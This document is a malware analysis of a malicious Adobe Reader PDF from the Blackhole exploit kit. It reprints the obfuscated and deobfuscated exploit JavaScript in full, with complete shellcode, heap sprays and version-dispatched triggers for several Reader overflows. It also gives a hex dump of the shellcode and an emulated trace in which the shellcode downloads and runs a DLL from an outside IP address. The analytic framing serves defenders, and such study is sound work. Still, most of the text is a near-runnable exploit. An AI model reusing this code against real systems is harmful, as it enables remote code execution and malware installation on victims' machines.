- This is a malicious PDF that exploits Adobe Reader through the Collab.getIcon() flaw (CVE-2009-0927); the embedded JavaScript also carries fallback triggers chosen by viewer version (see the deobfuscated script below).
- This sample was served by the Blackhole exploit kit as a stage in a ZeuS drop chain.
- VT analysis is here:
- https://www.virustotal.com/file/33d0c165072c82b7696cf0b152abdd3e3b2134f5e6ba6fa4fb9da80ad4e1b6fc/analysis/1334855876/
- Detailed analysis follows (VirusTotal was temporarily unavailable to me, so I pasted it here).
- =============================
- I found this sample here:
- ==============================
- --02:10:13-- hxxp://188.127.249.241/data/ap1.php?f=58
- => `ap1.php@f=58'
- Connecting to 188.127.249.241:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 16,488 (16K) [application/pdf]
- 100%[====================================>] 16,488 24.62K/s
- 02:10:15 (24.60 KB/s) - `ap1.php@f=58' saved [16488/16488]
- ==============
- Structure
- ==============
- %PDF-1.5
- %粤マモ
- 7 0 obj
- <</Count 1/Type/Pages/Kids[28 0 R]>>
- endobj
- 10 0 obj
- <</Creator(sli)/ModDate(D:20080817171147-07'00')/Company(Windjack Solutions, Inc.)/Title(al)>>
- endobj
- 21 0 obj
- <</Names 23 0 R/Outlines 1 0 R/Metadata 9 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups[]/OFF[]/Order[]>>/OCGs[27 0 R]>>/StructTreeRoot 11 0 R/Type/Catalog>>
- endobj
- 23 0 obj
- <</JavaScript 24 0 R/AP 8 0 R>>
- endobj
- 24 0 obj
- <</Names[78 0 R 76 0 R]>>
- endobj
- 25 0 obj
- <</S/JavaScript/JS 26 0 R>>
- endobj
- 26 0 obj
- <</Length 4/Filter[/FlateDecode]>>stream
- endstream
- endobj
- 28 0 obj
- <</CropBox[37 37 575 755]/Annots 29 0 R/Parent 7 0 R/StructParents 0/Contents 60 0 R/Rotate 90/MediaBox[0 0 612 792]/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/ProcSet[/PDF/Text/ImageC]/Properties<</MC0 27 0 R>>/ExtGState<</GS0 72 0 R>>>>/Type/Page>>
- endobj
- 59 0 obj
- [/ICCBased 68 0 R]
- endobj
- 60 0 obj
- <</Length 4/Filter/FlateDecode/Type/Contents>>
- stream
- endstream
- endobj
- 76 0 obj
- <</S/JavaScript/JS(
- function test2\(\){v=ar[z];s=s+cc[v];}
- ar=[62,
- 61,22,68,19,37,69,67,24,43,75,75,69,67,14,41,66,58,69,67,24,38,14,41,69,67,70,38,66,58,69,67,66,59,43,58,69,67,43,43,38,14,69,67,75,58,41,2,69,67,58,2,24,62,69,67,24,62,43,2,69......
- ...and so on...........54,66,13,20,74,17,54,13,60,74,74];
- cc={q:"+,0kl:-oz@_C*\)fVAa&={ds.8DxSE]I[KtU2y'5qQci3|v n<>Gw'r\(mW149;jbhpMeug%7N/P}6"}.q;
- qq='12e'+'wqva!l';
- q=qq[2]+qq[5]+qq[6]+qq[8];
- try{loadXML\({}\);}catch\($\){
- b={v:{q:this}}.v.q;
- w={v:b「q]}.v;
- s=Array\(\);
- n={v:cc}.v;
- for\(i=0;i-3854<0;i++\){
- z=i;
- test2\(\);
- }
- w\(s\);
- }
- )>>
- endobj
- xref
- 0 12
- trailer
- <</Size 12
- /Root 21 0 R>>
- xref
- 0 0
- trailer
- <</Size 12/Prev 75626/XRefStm 416/Root 21 0 R>>
- startxref
- 78995
- %%EOF
- ===============================
- JAVASCRIPT DEOBFUSCATED (object 76 rebuilds the string 'eval' from qq[2]+qq[5]+qq[6]+qq[8], fetches it as this['eval'], maps each of the 3854 ar[] indices through the cc alphabet to build the script, and eval()s it; the decoded script is reproduced below)
- ===============================
// Shellcode carried by every trigger below, stored as a %u-escaped UTF-16
// string and materialised with unescape(). The paste wraps the literal across
// several lines; in the PDF object it is a single string. Its tail (from
// %u7468 on) is the little-endian ASCII of the URL seen in the API trace
// further down, hxxp://188.127.249.241/w.php?f=58&e=3, which the shellcode
// fetches to %TEMP%\wpbt0.dll and runs via WinExec / regsvr32 -s.
bjsg = '
%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
%u7468%u7074%u2f3a%u312f%u3838%u312e%u3732%u322e%u3934%u322e%u3134%u772f%u702e%u7068%u663f
%u353d%u2638%u3d65%u0033%u0000';
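// Helper shared by the sprays below: doubles `ra` until it holds at least
// qy/2 UTF-16 units, then trims it to exactly qy/2 units. qy is a byte
// count, so each returned NOP sled pads a slab to qy bytes.
//
// The paste had this function and bx() wrapped mid-token ("une\nscape") and
// the index brackets mangled to 「」; the listing is restored here, logic
// unchanged.
function ezvr(ra, qy){
    while (ra.length * 2 < qy){
        ra += ra;
    }
    ra = ra.substring(0, qy / 2);
    return ra;
}

// Trigger for Reader 6.x/7.x with EScript < 7.11 (see the version dispatch at
// the bottom): heap-sprays NOP+shellcode slabs of 0x400000 bytes up to
// 0x0c0c0c0c, then hands an over-long `msg` to Collab.collectEmailInfo().
// This is the Collab.collectEmailInfo overflow (widely catalogued as
// CVE-2007-5659 — that ID is not stated on this page; confirm against the
// sample).
function bx(){
    var dkg = new Array();
    var vw = 0x0c0c0c0c;                        // spray target address
    var addr = 0x400000;                        // slab size in bytes
    var payload = unescape(bjsg);
    var sc_len = payload.length * 2;            // shellcode size in bytes
    var qy = addr - (sc_len + 0x38);            // NOP bytes per slab, minus shellcode and 0x38 header
    var yarsp = unescape('%u9090%u9090');
    yarsp = ezvr(yarsp, qy);
    var count2 = (vw - 0x400000) / addr;        // slabs needed to reach vw
    for (var count = 0; count < count2; count ++ ){
        dkg[count] = yarsp + payload;
    }
    // 0x0c0c0c0c repeated past 44952 UTF-16 units: overwrites control data
    // with the spray address.
    var overflow = unescape('%u0c0c%u0c0c');
    while (overflow.length < 44952){
        overflow += overflow;
    }
    this.collabStore = Collab.collectEmailInfo({
        subj : '', msg : overflow
    });
}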
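// Trigger for EScript 7.1 (see the version dispatch at the bottom): sprays
// 1400 blocks of roughly 0x40000 UTF-16 units (0x0A0A filler + shellcode),
// then calls util.printf() with a '%45000f' format on an oversized number.
// This is the util.printf stack overflow (widely catalogued as CVE-2008-2992
// — that ID is not stated on this page; confirm against the sample).
//
// nop/heapblock/bigblock/headersize/spray/fillblock/block/mem are assigned
// without `var`, i.e. as implicit globals, exactly as in the original.
// The paste had mem's index brackets mangled to 「」 and the numeric literal
// wrapped across four lines; both are restored here, logic unchanged.
function printf(){
    nop = unescape('%u0A0A%u0A0A%u0A0A%u0A0A');
    var payload = unescape(bjsg);
    heapblock = nop + payload;
    bigblock = unescape('%u0A0A%u0A0A');
    headersize = 20;                            // presumably the engine's string header size
    spray = headersize + heapblock.length;
    while (bigblock.length < spray){
        bigblock += bigblock;
    }
    fillblock = bigblock.substring(0, spray);
    block = bigblock.substring(0, bigblock.length - spray);
    while (block.length + spray < 0x40000){
        block = block + block + fillblock;
    }
    mem = new Array();
    for (i = 0; i < 1400; i ++ ){
        mem[i] = block + heapblock;
    }
    var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf('%45000f', num);
}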
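// Trigger for EScript 9 and for Reader 8 with EScript <= 8.12 (see the
// version dispatch at the bottom): the Collab.getIcon() stack overflow,
// CVE-2009-0927. Sprays NOP+shellcode slabs of 0x400000 bytes up to
// 0x0c0c0c0c, then calls getIcon() with 'N.' followed by 0x4000 tab (0x09)
// characters — the byte sequence shown in the "EXPLOIT CODE" dump below
// (4e 2e 09 09 ...).
//
// The paste had arry's index brackets mangled to 「」; restored here, logic
// unchanged.
function geticon(){
    var arry = new Array();
    if (app.doc.Collab.getIcon){
        var payload = unescape(bjsg);
        var hWq500CN = payload.length * 2;                  // shellcode size in bytes
        var qy = 0x400000 - (hWq500CN + 0x38);              // NOP bytes per slab
        var yarsp = unescape('%u9090%u9090');
        yarsp = ezvr(yarsp, qy);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;  // slab count
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
            arry[vqcQD96y] = yarsp + payload;
        }
        var tUMhNbGw = unescape('%09');
        while (tUMhNbGw.length < 0x4000){
            tUMhNbGw += tUMhNbGw;
        }
        tUMhNbGw = 'N.' + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
    }
}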
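// Version dispatch: pick the trigger matching the installed Reader.
// `sv` is the major viewer version (first character of app.viewerVersion);
// `lv` is the version of the EScript (JavaScript) plug-in, left undefined
// if no plug-in of that name is found. `aPlugins` is an implicit global, as
// in the original.
//
// The paste had the index brackets mangled to 「」; restored here, logic
// unchanged.
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i ++ ){
    if (aPlugins[i].name == 'EScript'){
        var lv = aPlugins[i].version;
    }
}
if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
    geticon();      // Collab.getIcon, CVE-2009-0927
}
else if (lv == 7.1){
    printf();       // util.printf overflow
}
else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
    bx();           // Collab.collectEmailInfo overflow
}
// NOTE: this condition is a tautology for any numeric lv — `(lv >= 9.1) ||
// (lv <= 9.2)` is always true — so every version not matched above lands
// here; the `i > 8.12 && i < 8.2` test inside is what really gates the
// trigger (it is only false when lv is undefined/NaN).
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
    // util.printd() with a malformed format string, called twice before and
    // once after media.newPlayer(null). This is the media.newPlayer
    // use-after-free trigger (widely catalogued as CVE-2009-4324 — that ID is
    // not stated on this page; confirm against the sample).
    function a(){
        util.printd('p@111111111111111111111111 : yyyy111', new Date());
    }
    var h = app.plugIns;
    for (var f = 0; f < h.length; f ++ ){
        if (h[f].name == 'EScript'){
            var i = h[f].version;       // re-declares the outer loop index `i`
        }
    }
    if ((i > 8.12) && (i < 8.2)){
        c = new Array();                // implicit global, as in the original
        var d = unescape('%u9090%u9090');
        var e = unescape(bjsg);
        while (d.length <= 0x8000){
            d += d;
        }
        d = d.substr(0, 0x8000 - e.length);
        for (f = 0; f < 2900; f ++ ){
            c[f] = d + e;
        }
        a();
        a();
        try {
            this.media.newPlayer(null);
        }
        catch (e){
        }
        a();
    }
}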
- ===========================
- EXPLOIT CODE
- ===========================
- The argument built for Collab.getIcon() — 'N.' followed by a long run of 0x09 bytes — matches CVE-2009-0927 (Adobe Reader getIcon stack overflow):
- code:
- 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- ................................................
- .........and so on..............................
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09
- =============================
- Shellcode
- =============================
- 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
- 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
- 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
- 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
- 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
- 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
- 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
- 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
- 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
- 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
- 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
- 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
- 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
- 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
- eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
- 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
- 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
- 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
- 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
- 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
- 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
- c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
- 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
- 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
- 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 31 38 38
- 2e 31 32 37 2e 32 34 39 2e 32 34 31 2f 77 2e 70
- 68 70 3f 66 3d 35 38 26 65 3d 33 00 00 00
- ===================
- Which, when the shellcode is emulated, resolves to the following API calls (VirtualProtect, LoadLibraryA on urlmon, URLDownloadToFileA into %TEMP%\wpbt0.dll, then WinExec on the DLL and on regsvr32 -s):
- ===================
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248,
- [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0,
- szURL=hxxp://188.127.249.241/w.php?f=58&e=3,
- lpfnCB=0x0,
- szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
- 0x7c86250d kernel32.WinExec(
- lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(
- lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- ====================
- Fetching the second stage the shellcode requests (w.php?f=58 — note the shellcode itself appends &e=3, which this manual request omitted) returned an empty body, so the dropped DLL could not be collected at analysis time:
- ====================
- --02:28:02-- hxxp://188.127.249.241/w.php?f=58
- => `w.php@f=58'
- Connecting to 188.127.249.241:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 0 [text/html]
- [ <=> ] 0 --.--K/s
- 02:28:02 (0.00 B/s) - `w.php@f=58' saved